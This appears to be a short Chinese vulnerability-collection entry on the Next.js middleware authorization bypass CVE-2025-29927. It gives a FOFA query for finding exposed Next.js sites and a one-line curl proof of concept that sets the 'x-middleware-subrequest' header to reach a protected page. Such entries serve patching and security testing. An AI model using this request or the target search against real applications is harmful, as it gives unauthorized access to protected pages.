2025-04-07 11:15:01 +08:00
|
|
|
|
# Next中间件绕过漏洞(CVE-2025-29927)
|
2025-04-07 11:11:41 +08:00
|
|
|
|
|
2025-04-07 11:15:01 +08:00
|
|
|
|
Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。在受影响的版本中,如果 Next.js 应用程序正在基于路径名的中间件中执行授权,则可能会绕过应用程序根目录下的页面的此授权,允许未经授权访问Next.js应用程序中的根级页面,这些页面本应受到授权检查的保护
|
|
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
|
```javascript
|
|
|
|
|
|
app="NEXT.JS"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## poc
|
|
|
|
|
|
```javascript
|
|
|
|
|
|
curl -H "x-middleware-subrequest: middleware" http://10.10.72.67:3000/protected
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞来源
|
|
|
|
|
|
|
2025-04-07 11:15:45 +08:00
|
|
|
|
- https://github.com/aydinnyunus/CVE-2025-29927
|
